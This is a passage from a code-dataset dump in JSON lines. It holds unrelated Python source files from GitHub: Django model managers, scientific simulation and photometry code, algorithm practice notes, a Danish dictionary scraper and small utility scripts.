rest_framework.response import Response\nimport shop.models as my_models\nfrom shop.models import *\nfrom user.models import *\n\n\nclass CategoryQuerySet(models.QuerySet):\n def get_super_category(self, name):\n super_category = None\n try:\n super_category = self.get(name=name)\n 
except Category.DoesNotExist:\n print('crawler is buggy!')\n\n return super_category\n\n def create_category(self, name, super_category=None):\n return self.create(name=name, super_category=super_category)\n\n def make_or_get(self, category_name):\n return self.get_or_create(name=category_name)\n\n\nclass CategoryManager(models.Manager):\n\n def get_queryset(self):\n return CategoryQuerySet(self.model, using=self._db)\n\n def create_for_crawler(self, data):\n super_category_name = data['super_category']\n category_name = data['name']\n if super_category_name is not None:\n super_category = self.get_queryset().get_super_category(super_category_name)\n return self.get_queryset().create_category(category_name, super_category)\n return self.get_queryset().create_category(category_name)\n\n def process_category(self, data):\n self.create_for_crawler(data)\n\n def make_or_get(self, category_name):\n return self.get_queryset().make_or_get(category_name)\n\n\nclass ProductQuerySet(models.QuerySet):\n def create_product(self, product):\n return self.create(id=product['id'], title=product['title'], brand=product['brand'], category=product['category'])\n\n\nclass ProductManager(models.Manager):\n def get_queryset(self):\n return ProductQuerySet(self.model, using=self._db)\n\n def process_product(self, data):\n self.create_product(data)\n\n def create_product(self, data):\n return self.get_queryset().create_product(data)\n\n\nclass VendorProductQuerySet(models.QuerySet):\n pass\n\n\nclass VendorProductManager(models.Manager):\n def get_queryset(self):\n return VendorProductQuerySet(self.model, using=self._db)\n\n def get_vendor_products_by_view(self, username):\n return self.get_queryset().order_by('-number_of_views'\n ).values('product__id',\n 'base_price', 'price', 'discount_percent',\n 'discount_price_difference', 'number_of_views', 'product__title',\n 'product__brand__name', 'product__category__name').filter(vendor__name=username)\n\n def get_vendor_products_with_detail(self):\n return self.get_queryset().values('product__id',\n 'base_price', 'price', 'discount_percent',\n 'discount_price_difference', 'number_of_views', 'product__title',\n 'product__brand__name', 'product__category__name')\n\n def increment_vendor_product_views(self, primary_key):\n vendor_product = self.get_queryset().filter(product_id=primary_key)\n vendor_product.update(number_of_views=F('number_of_views') + 1)\n # try:\n # my_object = self.get_queryset().get(product_id=primary_key)\n # my_object.number_of_views = my_object.number_of_views + 1\n # my_object.save()\n # except my_models.VendorProduct.DoesNotExist:\n # print(\"user is not a vendor!\")\n\n\nclass CrawlerProductProcessor(models.Manager):\n\n @classmethod\n def process(cls, data):\n category = cls.create_or_get_category(data['category_name'])\n brand = cls.create_or_get_brand(data['brand'], category)\n product_info = {\n 'id': data['id'],\n 'title': data['name'],\n 'brand': brand,\n 'category': category,\n }\n product = cls.create_or_get_product(product_info)\n vendor = cls.create_or_get_vendor(data['vendor'])\n cls.create_or_get_vendor_product(product, vendor, data)\n\n @classmethod\n def create_or_get_brand(cls, brand_name, brand_category):\n brand = None\n try:\n brand, created = my_models.Brand.objects.get_or_create(name=brand_name, defaults={'category': brand_category})\n except my_models.Brand.DoesNotExist:\n print(\"created brand!\")\n return brand\n\n @staticmethod\n def create_or_get_category(category_name):\n category, created = 
my_models.Category.objects.make_or_get(category_name=category_name)\n return category\n\n @classmethod\n def create_or_get_vendor(cls, name):\n vendor, created = my_models.Vendor.objects.get_or_create(name=name)\n cls.map_vendor_to_existing_user(vendor)\n return vendor\n\n @staticmethod\n def create_or_get_vendor_product(product, vendor, other_info):\n default = {\n 'base_price': other_info['base_price'],\n 'price': other_info['price'],\n 'id': other_info['id'],\n }\n my_models.VendorProduct.objects.get_or_create(product=product, vendor=vendor, defaults=default)\n\n @staticmethod\n def create_or_get_product(data):\n product = None\n try:\n default = {\n 'category': data['category'],\n 'brand': data['brand'],\n 'id': data['id'],\n }\n product, created = my_models.Product.objects.get_or_create(id=data['id'], title=data['title'], defaults=default)\n except my_models.Product.DoesNotExist:\n print('product created!')\n return product\n\n @classmethod\n def map_vendor_to_existing_user(cls, vendor):\n users = User.objects.filter(username=vendor.name)\n if users.count() == 1:\n vendor.user = users[0]\n vendor.save()\n","repo_name":"Mhb-Stud/product_data_api_bayati","sub_path":"shop/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70387119787","text":"#! /usr/bin/env python\nimport numpy as np\nimport pandas as pd\nfrom math import log, exp\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\nif __name__ == '__main__':\n data = pd.read_csv(\"laurent_coeffs_2_511.csv\", sep=',\\s+')\n odd_numerators = data['numerator'][1::2]\n even_numerators = data['numerator'][::2]\n \n model = LinearRegression()\n\n start_idx = 120\n\n x = np.reshape(odd_numerators.index[start_idx:], (-1,1))\n y = [[log(abs(int(a)))] for a in odd_numerators.values[start_idx:]]\n model.fit(x,y)\n\n score = model.score(x,y)\n\n slope = model.coef_[0][0]\n intercept = model.intercept_[0]\n\n print(\"Slope: {}\\nIntercept: {}\".format(slope, intercept))\n print(f\"Exp growth rate: {exp(slope)}\")\n\n\n # plt.loglog(even_numerators)\n # plt.show()\n","repo_name":"DannyStoll1/polymath-fractal-geometry","sub_path":"codes/coeffs_log_log_plot.py","file_name":"coeffs_log_log_plot.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21244493704","text":"\n\n\"\"\"\nInput: {4,2,3,6,10,1,12}\nOutput: 5\nExplanation: The LBS is {2,3,6,10,1}.\n\nlength of Longest Increasing Subseq\nmax_len =\n{4,2,3,6,10,1,12}\n\"\"\"\n\n\"\"\"\n{11,2,1,0,12}\n{11,2,13, 1,0,11,-1,12}\n{11,2,13}\nmax_len = 1\nprev = 11\ncur = 2\n\n{\n 11: 0,\n 2: 1,\n}\n[\n [],\n [],\n]\n--\n{11,2,13, 1,0,11,-1,12}\n 11\n subset = []\n--\ni = 1\nel = 2\nsubset = [11]\n--\ni = 2\nel = 13\nsubset = [11, 13]\n\ndef longstIncSubsequence(nums):\n max_len = 0\n def backtrack(i, nums, subset):\n if i == len(nums):\n return len(subset)\n\n if not subset or nums[i] > subset[-1]:\n subset.append(nums[i])\n dp[cur + 1][] = dp[cur][]\n\n return backtrack(i + 1, nums, subset)\n for i in range(len(nums)):\n max_len = max(backtrack(i, nums, []), max_len)\n return max_len\n\"\"\"\n\ndef longest_increasing_subsequence(nums):\n dp = [[0]*len(nums) for _ in range(0,len(nums)+1)]\n def helper(nums,pre,cur,dp):\n if cur >= len(nums) or pre >= len(nums):\n return 0\n\n if dp[cur][pre + 1]:\n return dp[cur][pre + 1]\n res1 = 0\n 
if pre == -1 or nums[pre] < nums[cur]:\n res1 = 1 + helper(nums, cur, cur + 1, dp)\n res2 = helper(nums, pre, cur + 1, dp)\n\n current_longest_sub = max(res1, res2)\n dp[cur][pre + 1] = current_longest_sub\n return current_longest_sub\n return helper(nums, -1, 0, dp)\n\n\n\n\"\"\"\n public int findLISLength(int[] nums) {\n int[] dp = new int[nums.length];\n dp[0] = 1;\n\n int maxLength = 1;\n for (int i=1; i nums[j] && dp[i] <= dp[j] ) {\n dp[i] = dp[j]+1;\n maxLength = Math.max(maxLength, dp[i]);\n }\n }\n return maxLength;\n }\n public int findLCSLength(String s1, String s2) {\n Integer[][] dp = new Integer[s1.length()][s2.length()];\n return findLCSLengthRecursive(dp, s1, s2, 0, 0);\n }\n\n private int findLCSLengthRecursive(Integer[][] dp, String s1, String s2, int i1, int i2) {\n if (i1 == s1.length() || i2 == s2.length())\n return 0;\n\n if (dp[i1][i2] == null) {\n if (s1.charAt(i1) == s2.charAt(i2))\n dp[i1][i2] = 1 + findLCSLengthRecursive(dp, s1, s2, i1 + 1, i2 + 1);\n else {\n int c1 = findLCSLengthRecursive(dp, s1, s2, i1, i2 + 1);\n int c2 = findLCSLengthRecursive(dp, s1, s2, i1 + 1, i2);\n dp[i1][i2] = Math.max(c1, c2);\n }\n }\n\n return dp[i1][i2];\n }\n\"\"\"\n","repo_name":"aarboleda1/Elements-Of-Programming-Interviews","sub_path":"mock_interviews/longest_increasing_subsequence.py","file_name":"longest_increasing_subsequence.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"12555177698","text":"import numpy as np\nfrom scipy import spatial\nfrom scipy.sparse import csr_matrix\nfrom PDDO_Utilities import *\n\nfrom itertools import compress\n\n\nclass DM2D:\n def __init__(self, numtime, delta, dx, dt, varname):\n self.numtime = numtime\n self.delta = delta\n self.dx = dx\n self.dt = dt\n self.varname = varname\n self.velocity = []\n self.u_coords = []\n self.u_vals = []\n self.fams = []\n self.samp_ids = []\n self.u_samp = []\n self.fam_exst = False\n\n def check_fam_build(self):\n # Just checks if the families are constructed\n print(self.fam_exst)\n\n\n def split_fam_gen(self, d_coords, d_vals, init_lev_sets):\n \"\"\"\n Generates family member indices for given timeseries\n coordinates for the 2D region separated by the moving\n boundary\n \"\"\"\n self.fam_exst = True\n bool_reg = (init_lev_sets < 0)\n self.u_coords = list(compress(d_coords, bool_reg))\n tree_u = spatial.KDTree(self.u_coords)\n for k in self.u_coords:\n fam_pts = tree_u.query_ball_point(\n k, self.delta * self.dx, return_sorted=True\n )\n self.fams.append(fam_pts)\n for i in range(self.numtime - 1):\n self.u_vals.append(list(compress(d_vals[i], bool_reg)))\n self.velocity.append(list(compress((d_vals[i + 1] - d_vals[i]) / self.dt, bool_reg)))\n\n\n def gendmat(self, order):\n \"\"\"\n Global derivative matrix calculation using PDDO.\n \"\"\"\n nonzcounter = 0\n lenxy = len(self.u_coords)\n totnz = sum([len(listElem) for listElem in self.fams])\n _, _, _, lens = PD2D.binomial_coeff(order + 1)\n dmats = []\n dmatscsr = []\n amat = np.zeros([lens, lens])\n for _ in range(lens):\n dmats.append(\n [\n np.zeros(totnz, dtype=np.int),\n np.zeros(totnz, dtype=np.int),\n np.zeros(totnz),\n ]\n )\n for i in range(lenxy):\n bmat = PD2D.gen_bmat(order)\n pts = self.fams[i]\n amat.fill(0.0)\n for k in pts:\n xi = self.u_coords[k] - self.u_coords[i]\n amat += PD2D.gen_amat(xi, self.delta * self.dx, order)\n amat *= self.dx * self.dx\n cfs = np.linalg.solve(amat, bmat)\n for k in pts:\n xi = self.u_coords[k] - 
self.u_coords[i]\n gfs = PD2D.inv_gfunc(xi, self.delta * self.dx, cfs, order)\n for derord in range(lens):\n dmats[derord][0][nonzcounter] = i\n dmats[derord][1][nonzcounter] = k\n dmats[derord][2][nonzcounter] = gfs[derord] * self.dx * self.dx\n nonzcounter += 1\n for i in range(lens):\n dmatscsr.append(\n csr_matrix(\n (dmats[i][2], (dmats[i][0], dmats[i][1])),\n shape=(lenxy, lenxy),\n )\n )\n return dmatscsr\n\n def gen_derlist(self, order):\n _, ord1, ord2, _ = PD2D.binomial_coeff(order + 1)\n ord1 = [ord * \"x\" for ord in ord1]\n ord2 = [ord * \"y\" for ord in ord2]\n der_list = [self.varname + \"_{\" + i + j + \"}\" for i, j in zip(ord1, ord2)]\n der_list[0] = self.varname\n u_ders = [[] for x in range((order + 1) * (order + 2) // 2)]\n return der_list, u_ders\n","repo_name":"alicanbekar/MB_PDDO-SINDy","sub_path":"Fisher_KPP_Domain.py","file_name":"Fisher_KPP_Domain.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73930482346","text":"import socket\nimport urllib\nimport struct\n\ndef Topic(addr:str, port:int, querystr:str or dict):\n \"\"\"\n\tFetch- oh i mean topic\n `getserverdata.php` (see tg repo)\n\t\"\"\"\n print(\"INFO: FETCH REQ: \"+addr+\":\"+str(port))\n try:\n if querystr[0] != \"?\":\n querystr = \"?\"+querystr\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n query = b\"\\x00\\x83\" + struct.pack('>H', len(querystr) + 6) + b\"\\x00\\x00\\x00\\x00\\x00\" + querystr.encode() + b\"\\x00\"\n\n sock.connect((addr, port))\n sock.sendall(query)\n data = sock.recv(4096)\n parsed_data = urllib.parse.parse_qs(data[5:-1].decode())\n return {i:parsed_data[i][0] for i in parsed_data.keys()}\n except Exception as E:\n print(\"ERROR: fetch: \",E)\n return {}\n\ndef getSeconds(h:int=0,m:int=0,s:int=0):\n return (int(h) * 3600) + (int(m) * 60) + int(s)\n\ndef safeget(dct:dict, *keys):\n \"\"\"\n get keys without ``KeyError``\n \"\"\"\n for key in keys:\n try:\n dct = dct[key]\n except KeyError:\n return None\n return dct\n","repo_name":"LetterN/cat-cog","sub_path":"ss13/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4492440703","text":"from ibvpy.api import \\\n TStepper as TS, RTDofGraph, RTraceDomainListField, RTraceDomainListInteg, TLoop, \\\n TLine, BCDofGroup, IBVPSolve as IS, DOTSEval, BCSlice\n\nfrom ibvpy.mesh.fe_grid import FEGrid\nfrom numpy import column_stack\n\ndef simgrid( fets_eval, \n cube_size,\n shape,\n support_slices,\n support_dirs,\n loading_slice,\n load_dir = 0,\n load_max = 0.01,\n n_load_steps = 1,\n vars = [],\n ivars = [],\n var_type = 'u',\n ):\n '''Construct an idealization and run simulation with primary variable \n fixed on support slices and with unit load on loading slices applied in load dir.\n Return the solution vector and the fields specified in vars.\n '''\n # Discretization\n domain = FEGrid( coord_max = cube_size, \n shape = shape,\n fets_eval = fets_eval )\n\n u_max = load_max\n\n support_bcond = [ BCSlice( var = 'u', value = 0, \n dims = support_dir, \n slice = domain[support_slice] )\n for support_slice, support_dir in zip( support_slices, support_dirs ) ]\n load_bcond = [ BCSlice( var = var_type, value = u_max, \n dims = [load_dir], \n slice = domain[loading_slice] ) ]\n\n bcond = support_bcond + load_bcond \n\n loading_dofs = domain[loading_slice].dofs[:,:,load_dir].flatten()\n\n graphs = [ 
RTDofGraph( name = 'Force in one node / Displ.',\n var_y = 'F_int', idx_x = loading_dof,\n var_x = 'U_k' , idx_y = loading_dof )\n for loading_dof in loading_dofs ]\n\n rtrace_list = [ RTraceDomainListField( name = var ,\n var = var,\n warp = True, \n #position = 'int_pnts',\n record_on = 'update' )\n for var in vars\n ]\n irtrace_list = [ RTraceDomainListInteg( name = 'Integ(' + var + ')' ,\n var = var,\n record_on = 'update' )\n for var in ivars ]\n \n ts = TS(\n sdomain = domain,\n bcond_list = bcond,\n rtrace_list = graphs + rtrace_list + irtrace_list\n )\n\n load_step = 1. / float( n_load_steps )\n # Add the time-loop control\n tloop = TLoop( tstepper = ts, KMAX = 15, RESETMAX = 0, tolerance = 1e-5,\n tline = TLine( min = 0.0, step = load_step, max = 1.0 ))\n\n u = tloop.eval()\n \n fields = [ rtrace.subfields[0].field_arr for rtrace in rtrace_list ]\n integs = [ rtrace.integ_val for rtrace in irtrace_list ]\n for graph in graphs:\n graph.redraw()\n traces = [ graph.trace for graph in graphs ]\n xydata = ( traces[0].xdata, column_stack( [trace.ydata for trace in traces ] ) )\n\n return tloop, u, fields, integs, xydata\n\nif __name__ == '__main__':\n\n from ibvpy.mats.mats3D.mats3D_elastic.mats3D_elastic import MATS3DElastic\n from ibvpy.mats.mats2D.mats2D_elastic.mats2D_elastic import MATS2DElastic\n \n from ibvpy.fets.fets3D.fets3D8h import FETS3D8H\n from ibvpy.fets.fets2D5.fets2D58h import FETS2D58H\n\n fets_eval_3D = FETS3D8H(mats_eval = MATS3DElastic(E = 34000, nu = 0.25)) \n\n support_slices = [\n [ (0 ,slice(None),slice(None),0 ,slice(None),slice(None)), # yz plane 0\n (0 ,0 ,slice(None),0 ,0 ,slice(None)), # z-axis 1\n (0 ,0 , 0,0 ,0 ,0 ) # origin 2\n ],\n [ \n (0 ,0 ,0 ,0 ,0 ,0 ), # origin 0\n (slice(None),0 ,slice(None),slice(None),0 ,slice(None)), # xz plane 1\n (slice(None),0 ,0 ,slice(None),0 ,0 ), # y-axis 2\n ],\n [ \n (0 ,slice(None),0 ,0 ,slice(None),0 ), # x-axis 0\n (0 ,0 ,0 ,0 ,0 ,0 ), # origin 1\n (slice(None),slice(None),0 ,slice(None),slice(None),0 ), # xy plane 2\n ], \n ]\n support_dirs = [[0],[1],[2]]\n \n loading_slices = [ \n (-1 ,slice(None),slice(None),-1 ,slice(None),slice(None)), # loading in x dir\n (slice(None),-1 ,slice(None),slice(None),-1 ,slice(None)), # loading in y dir\n (slice(None),slice(None),-1 ,slice(None),slice(None),-1 ) # loading in z dir\n ]\n\n tl, u1, fields, integs, g = simgrid( fets_eval_3D, (3,3,3), (1,1,1), \n support_slices[0], support_dirs,\n loading_slices[0], 0, 0.01, 1, [] )\n \n tl, u2, fields, integs, g = simgrid( fets_eval_3D, (3,3,3), (1,1,1), \n support_slices[1], support_dirs,\n loading_slices[1], 1, 0.01, 1, ['u'] )\n \n print('u1')\n for idx, u in enumerate( u1 ):\n print('[', idx, ']', u)\n \n print('u2')\n for idx, u in enumerate( u2 ):\n print('[', idx, ']', u)\n \n \n ","repo_name":"simvisage/bmcs","sub_path":"ibvpy/utils/simgrid.py","file_name":"simgrid.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20629543573","text":"#!/usr/bin/env python\n\nimport argparse\n\nimport emit.data_products as dp\n\nPRIMARY_HDR_LEN = 6\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"infile\")\nparser.add_argument(\"threshold\", type=int)\nargs = parser.parse_args()\n\nin_file = open(args.infile, \"rb\")\n\ncnt = 0\nskip = 4000\nwhile True:\n try:\n pkt = dp.CCSDSPacket(in_file)\n # pkt_size = PRIMARY_HDR_LEN + pkt.pkt_data_len + 1\n pkt_size = pkt.pkt_data_len\n if pkt_size < args.threshold:\n print(f\"Found 
small packet of size {pkt_size}\")\n cnt += 1\n if pkt.pkt_seq_cnt % skip == 0:\n print(f\"Packet {str(pkt.pkt_seq_cnt).zfill(5)} size: {pkt_size}\")\n except EOFError:\n break\n\nprint(f\"Count of packets less than {args.threshold} bytes: {cnt}\")\n","repo_name":"emit-sds/emit-sds-l0","sub_path":"util/packet_size_check.py","file_name":"packet_size_check.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33512028959","text":"import atexit\nimport logging\nimport os\n\nimport settings\nfrom runner.managers.manager import Manager\nfrom structures.profiles import NucleicAcidProfile\n\nlogger = logging.getLogger(__name__)\n\n\nclass NucleicAcidProfileManager(Manager):\n \"\"\"\n Manager for the program's current NucleicAcidProfile instance.\n\n Attributes:\n current: The current NucleicAcidProfile instance.\n runner: NATuG's program runner.\n profiles_filepath: The path to the directory where profiles are stored.\n restored_filepath: The path to the file where the restored state is stored.\n default_profile_name: The name of the default profile.\n\n Methods:\n load_profiles: Load the nucleic acid profiles from files.\n dump_profiles: Dump the nucleic acid profiles into files.\n restore: Load default NucleicAcidProfile\n \"\"\"\n\n profiles_filepath = f\"saves/nucleic_acid\"\n default_filepath = f\"saves/nucleic_acid/{settings.default_nucleic_acid_profile}.json\"\n\n def __init__(self, runner: object, current: object = None, profiles=None):\n super().__init__(runner, current)\n if profiles:\n self.profiles = profiles\n else:\n self.profiles = {}\n self.load_profiles()\n atexit.register(self.dump)\n\n def restore(self):\n \"\"\"Load the default nucleic acid profile as the current one.\"\"\"\n self.current = self.profiles[settings.default_nucleic_acid_profile]\n logger.debug(\n f\"Loaded current nucleic acid profile {settings.default_nucleic_acid_profile}\"\n )\n\n def load_profiles(self) -> None:\n \"\"\"\n Load saved profiles and restored state from files.\n\n Each profile is loaded from a separate file in the profiles directory. The\n names of the files are the names of the profiles where underscores are\n replaced with spaces (dumping is the reverse of this).\n\n No specific current profile is set because when the program loads an entire\n program state is reloaded which includes the current nucleic acid profile.\n \"\"\"\n profile_files = filter(\n lambda filename: filename.endswith(\".json\"),\n os.listdir(self.profiles_filepath),\n )\n\n # Load all profiles from individual files in the profiles directory\n for name in profile_files:\n # Load the profile from the file (we make sure to replace underscores\n # with spaces and \".json\" with \"\")\n self.profiles[\n name.replace(\"_\", \" \").replace(\".json\", \"\")\n ] = NucleicAcidProfile.from_file(f\"{self.profiles_filepath}/{name}\")\n logger.info(\n f'Loaded \"%s\" from \"%s\"', name, f\"{self.profiles_filepath}/{name}.json\"\n )\n\n # Log that profiles were loaded\n logger.debug(\"Loaded profiles. Profiles: %s\", self.profiles)\n\n def dump(self) -> None:\n \"\"\"\n Dump profiles and the current state to files.\n\n Each profile is dumped to a separate file in the profiles directory. 
The\n names of the files are the names of the profiles where spaces are replaced\n with underscores (loading is the reverse of this).\n \"\"\"\n # Dump all profiles into individual files\n for filename in os.listdir(self.profiles_filepath):\n filepath = f\"{self.profiles_filepath}/{filename}\"\n os.remove(filepath)\n logger.debug(f\"Deleted nucleic acid profile file \\\"%s\\\"\", filepath)\n for name, profile in self.profiles.items():\n name = name.replace(\" \", \"_\")\n profile.to_file(f\"{self.profiles_filepath}/{name}.json\")\n logger.info(\n f'Dumped \"%s\" into \"%s\"', name, f\"{self.profiles_filepath}/{name}.json\"\n )\n","repo_name":"NATuG3/NATuG3","sub_path":"runner/managers/nucleic_acid_profile.py","file_name":"nucleic_acid_profile.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"766260837","text":"\"\"\"\n\"\"\"\nfrom diffstar.defaults import SFR_MIN\nfrom dsps.dust.att_curves import _frac_transmission_from_k_lambda, sbl18_k_lambda\nfrom dsps.photometry.photometry_kernels import calc_obs_mag, calc_rest_mag\nfrom jax import jit as jjit\nfrom jax import numpy as jnp\nfrom jax import vmap\n\n_interp_vmap = jjit(vmap(jnp.interp, in_axes=[0, None, 0]))\n\n\n@jjit\ndef _calc_logmstar_formed(sfh, dt_gyr):\n sfh = jnp.where(sfh < SFR_MIN, SFR_MIN, sfh)\n smh = jnp.cumsum(sfh * dt_gyr) * 1e9\n logsmh = jnp.log10(smh)\n return logsmh\n\n\n_smh = [0, None]\n_calc_logmstar_formed_vmap = jjit(vmap(_calc_logmstar_formed, in_axes=_smh))\n\n\n@jjit\ndef _calc_age_met_weights_from_sfh_table_vmap():\n pass\n\n\n@jjit\ndef _mult(w1, w2):\n return w1 * w2\n\n\n_mult_vmap = jjit(vmap(vmap(_mult, in_axes=[None, 0]), in_axes=[0, None]))\n_get_weight_matrix = jjit(vmap(_mult_vmap, in_axes=[0, 0]))\n\n\n@jjit\ndef interpolate_ssp_photmag_table(z_gals, z_table, ssp_photmag_table):\n iz_hi = jnp.searchsorted(z_table, z_gals)\n iz_lo = iz_hi - 1\n z_lo = z_table[iz_lo]\n z_hi = z_table[iz_hi]\n dz_bin = z_hi - z_lo\n dz = z_gals - z_lo\n w_lo = 1 - (dz / dz_bin)\n\n ssp_table_zlo = ssp_photmag_table[iz_lo]\n ssp_table_zhi = ssp_photmag_table[iz_hi]\n\n s = ssp_table_zlo.shape\n outshape = [s[0], *[1 for x in s[1:]]]\n w_lo = w_lo.reshape(outshape)\n\n gal_photmags = w_lo * ssp_table_zlo + (1 - w_lo) * ssp_table_zhi\n return gal_photmags\n\n\n_z = [*[None] * 4, 0, *[None] * 4]\n_f = [None, None, 0, 0, None, *[None] * 4]\n_ssp = [None, 0, *[None] * 7]\n_calc_obs_mag_vmap_f = jjit(vmap(calc_obs_mag, in_axes=_f))\n_calc_obs_mag_vmap_f_ssp = jjit(\n vmap(vmap(_calc_obs_mag_vmap_f, in_axes=_ssp), in_axes=_ssp)\n)\n_calc_obs_mag_vmap_f_ssp_z = jjit(vmap(_calc_obs_mag_vmap_f_ssp, in_axes=_z))\n\n_calc_obs_mag_vmap_f_ssp_singlemet = jjit(vmap(_calc_obs_mag_vmap_f, in_axes=_ssp))\n_calc_obs_mag_vmap_f_ssp_z_singlemet = jjit(\n vmap(_calc_obs_mag_vmap_f_ssp_singlemet, in_axes=_z)\n)\n\n\n_calc_rest_mag_vmap_f = jjit(vmap(calc_rest_mag, in_axes=[None, None, 0, 0]))\n_calc_rest_mag_vmap_f_ssp = jjit(\n vmap(\n vmap(_calc_rest_mag_vmap_f, in_axes=[None, 0, None, None]),\n in_axes=[None, 0, None, None],\n )\n)\n\n_calc_rest_mag_vmap_f_ssp_singlemet = jjit(\n vmap(_calc_rest_mag_vmap_f, in_axes=[None, 0, None, None]),\n)\n\n\n@jjit\ndef _get_filter_effective_wavelength_rest(filter_wave, filter_trans):\n norm = jnp.trapz(filter_trans, x=filter_wave)\n lambda_eff = jnp.trapz(filter_trans * filter_wave, x=filter_wave) / norm\n return lambda_eff\n\n\n@jjit\ndef _get_filter_lambda_eff_obsframe_kern(filter_wave, 
filter_trans, redshift):\n    lambda_eff_rest = _get_filter_effective_wavelength_rest(filter_wave, filter_trans)\n    lambda_eff = lambda_eff_rest / (1 + redshift)\n    return lambda_eff\n\n\n@jjit\ndef _get_effective_attenuation(filter_wave, filter_trans, redshift, dust_params):\n    """Attenuation factor at the effective wavelength of the filter"""\n\n    lambda_eff = _get_filter_lambda_eff_obsframe_kern(\n        filter_wave, filter_trans, redshift\n    )\n    lambda_eff_micron = lambda_eff / 10_000\n\n    uv_bump_ampl, plaw_slope, dust_Av = dust_params\n    k_lambda = sbl18_k_lambda(lambda_eff_micron, uv_bump_ampl, plaw_slope)\n    frac_transmission = _frac_transmission_from_k_lambda(k_lambda, dust_Av)\n    return frac_transmission\n\n\n_g = in_axes = [None, None, 0, 0]\n_f = in_axes = [0, 0, None, None]\n_get_effective_attenuation_vmap = jjit(vmap(vmap(_get_effective_attenuation, _f), _g))\n","repo_name":"LSSTDESC/lsstdesc-diffsky","sub_path":"lsstdesc_diffsky/photometry/photometry_interpolation_kernels.py","file_name":"photometry_interpolation_kernels.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"13190875806","text":"import string\nimport sys\nfrom colorama import Fore, Back, Style\nfrom colorama import init\ninit(autoreset=True)\nimport urllib.request, urllib.parse, urllib.error\nfrom bs4 import BeautifulSoup\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\n\nfname = input("Enter file name: ")\nfhand = open(fname, encoding="utf8")\n\n\nSYMBOLS = '{}()[].,:;+-*/&|<>=~$1234567890?'\nwords = list()\nfor line in fhand:\n\tfor s in SYMBOLS:\n\t\tline = line.replace(s," ")\n\tprint(line)\n\tline=line.split()\n\t\n\twords= words + line\n\n# TYPE OF WORD\n\tfor word in words :\n\t\tprint(Fore.YELLOW + word)\n\t\ttry:\n\t\t\turl = "https://ordnet.dk/ddo/ordbog?query=%s" % (urllib.parse.quote(word)) # input('Enter URL- ')\n\t\t\thtml = urllib.request.urlopen(url, context=ctx).read()\n\t\t\n\t\t\tsoup = BeautifulSoup(html, 'html.parser')\n\t\t\t#print(soup)\n\t\t\t# # Retrieve all of the anchor divs\n\t\t\tdivs = soup('div')\n\t\t\tfor div in divs:\n\t\t\t\tdiv_class = div.get('class', [])\n\t\t\t\tif "definitionBoxTop" in div_class:\n\t\t\t\t\t# print(div_class)\n\t\t\t\t\tchildren = div.findChildren("span" , recursive=False)\n\t\t\t\t\tfor child in children: \n\t\t\t\t\t\tspan_class = child.get('class', [])\n\t\t\t\t\t\tif "tekstmedium" in span_class:\n\t\t\t\t\t\t\ttype_word=child.text\n\t\t\t\t\t\t\tprint(Fore.CYAN + type_word)\n# SOUND\t\n\t\t\tspan = soup.body.find('span', attrs={'class': 'lydskrift'})\n\t\t\tprint(span.text)\n\t\t\tfor href in span.find_all('a', recursive=True):\n\t\t\t\tprint( Fore.GREEN + str(href.get('href', "NotFound")))\n\n\t\texcept:\n\t\t\tprint(Fore.RED + "not found " )\n\n\n\n","repo_name":"AnaSoles/LANG_Danis_BankWords","sub_path":"dk_learn_new_words_gh.py","file_name":"dk_learn_new_words_gh.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22150897279","text":"import discord\r\nfrom discord.ext import commands \r\nimport traceback\r\n# requests and urllib.parse are used below but were never imported\r\nimport urllib.parse\r\nimport requests\r\n\r\nclass Lmgtfy(commands.Cog):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\t\tself.URL = "http://tinyurl.com/api-create.php"\t\r\n\r\n\tdef shorten(self, url_long):\r\n\t\ttry:\r\n\t\t\turl = self.URL + "?" 
